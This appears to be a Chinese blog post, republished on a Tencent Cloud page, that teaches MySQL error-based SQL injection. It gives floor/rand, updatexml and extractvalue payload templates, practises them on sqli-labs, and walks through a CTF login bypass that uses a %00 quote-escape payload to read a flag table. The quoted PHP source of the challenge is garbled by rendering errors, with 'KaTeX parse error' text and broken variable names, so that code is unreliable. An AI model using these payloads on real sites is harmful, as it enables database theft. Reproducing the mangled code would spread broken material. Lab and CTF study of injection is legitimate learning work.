前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >sqlmap报错注入

sqlmap报错注入

作者头像
全栈程序员站长
发布2022-11-11 14:38:54
2.3K0
发布2022-11-11 14:38:54
举报

大家好,又见面了,我是你们的朋友全栈君。

0x00 背景 学习记录一下报错型的注入,经各方整理和自己总结形成。

所有的注入原理都是一样,即用户输入被拼接执行。但后台数据库执行语句产生错误并回显到页面时即可能存在报错注入。

0x01概念 报错型注入的利用大概有以下3种方式:

复制代码 1:?id=2’ and (select 1 from (select count(*),concat( floor(rand(0)*2),(select (select (查询语句)) from information_schema.tables limit 0,1))x from information_schema.tables group by x )a )–+ 2:?id=2’ and updatexml(1,concat(0x7e,(SELECT 查询语句),0x7e),1)–+ 3:?id=1’ and extractvalue(1, concat(0x7e, (select 查询语句),0x7e))–+ 复制代码 对于1的分析:

复制代码 floor()是取整数 rand(0)*2将取0到2的随机数 floor(rand()2)有两条记录就会报错 floor(rand(0)2)记录需为3条以上,且3条以上必报错,返回的值是有规律的 count()是用来统计结果的,相当于刷新一次结果 group by 对数据分组时会先看看虚拟表里有没有这个值,若没有就插入,若存在则count()加1 group by 时floor(rand(0)*2)会被执行一次,若虚表不存在记录,插入虚表时会再执行一次 对于count()、rand()、group by 三者同时存在为什么会报错可以参考乌云tsafe的文章 复制代码 对于2的分析:

复制代码 函数的形式为:UPDATEXML (XML_document, XPath_string, new_value);、 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) , 第三个参数:new_value,String格式,替换查找到的符合条件的数据 作用:改变文档中符合条件的节点的值,即改变XML_document中符合XPATH_string的值 而我们的注入语句为:updatexml(1,concat(0x7e,(SELECT 查询语句),0x7e),1) concat()函数是将其参数连成一个字符串,因此不会符合XPATH_string的格式,从而出现格式错误导致错误信息返回。 复制代码 对于3的分析:

复制代码 EXTRACTVALUE (XML_document, XPath_string); 第一个参数:XML_document是String格式,为XML文档对象的名称 第二个参数:XPath_string (Xpath格式的字符串). 作用:从目标XML中返回包含所查询值的字符串

而我们的注入语句为:extractvalue(1, concat(0x7e, (select 查询语句),0x7e)) 同2一样因为不符合XPATH_string的格式所以会报错 复制代码 0x03 实践 以sqli lab作为测试

?id=1’时:

?id=1’%23时:

带入上面的payload:

可以看到通过xmlupdate成功通过报错信息将数据库名显示出来了,接下来再依次按照求表、列的步骤进行

0x04 CTF实例 i春秋百度杯十月VId

这里省略信息收集,直接到SQL注入的部分

这里只有一个登录框,贴出源代码:

复制代码 1 <?php 2 3 require_once ‘dbmysql.class.php’; 4 require_once ‘config.inc.php’; 5 6 if(isset(Knumber && aTeX parse error: Expected ‘EOF’, got ‘&’ at position 20: …T[‘username’]) &?& isset(_POST[‘password’]) && isset(username = d b ? > s a f e d a t a ( db->safe_data( db?>safed?ata(_POST[‘username’]); 9 _POST[‘number’] : 1; 11 12 u s e r n a m e = t r i m ( s t r r e p l a c e ( username = trim(str_replace( username=trim(strr?eplace(number, ‘’, username)); 13 14 s q l = ” s e l e c t ? f r o m ” . ” ‘ ” . t a b l e n a m e . ” ‘ ” . ” w h e r e u s e r n a m e = ” . ” ′ ” . ” sql = “select * from”.”`”.table_name.”`”.”where username=”.”‘”.” sql=“select?from“.“‘“.tablen?ame.“‘“.“whereusername=“.“′“.“username”.”’”; 15 row = d b ? > q u e r y ( db->query( db?>query(sql); 16

number && 1 public function safe_data(KaTeX parse error: Expected ‘}’, got ‘EOF’ at end of input: … stripcslashes(value); 4 } 5 return addslashes($value); 6 }

username在被传入之后首先被safe_data()转义,再被str_replace()处理去掉里面包含的number数字和空格,最后执行sql查询。在这里sql查询语句虽然也有拼接输入,但是需要闭合掉单引号。可是username在一开始加上单引号的话在被传入的时候就会被加上反斜杠。

读了i春秋论坛的writeup才明白可以这样构造:

Number=0&username=test%00’%23 Username经过转义变成test\0\’%23 然后替换操作 变成 test\’%23 单引号逃逸出去,同时因为用了trim所以不能使用空格来分割字段,可以使用+来连接。 最后构造的username为:

username=admin%00’+and+updatexml(1,concat(1,(select+*+from+flag+limit+1),1),1)%23 这里只能获取32位长度,要想获取完整的flag还需使用substr函数

0x05总结 这里只用了updatexml作为例子,其余2个原理都是一样的。

同时对于sqli lab的练习使用这一类注入手工速度很慢,接下来可以考虑写一个自动化的脚本。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/187698.html原文链接:https://javaforall.cn

本文参与?腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022年9月29日 ,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客?前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与?腾讯云自媒体同步曝光计划? ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
http://www.vxiaotou.com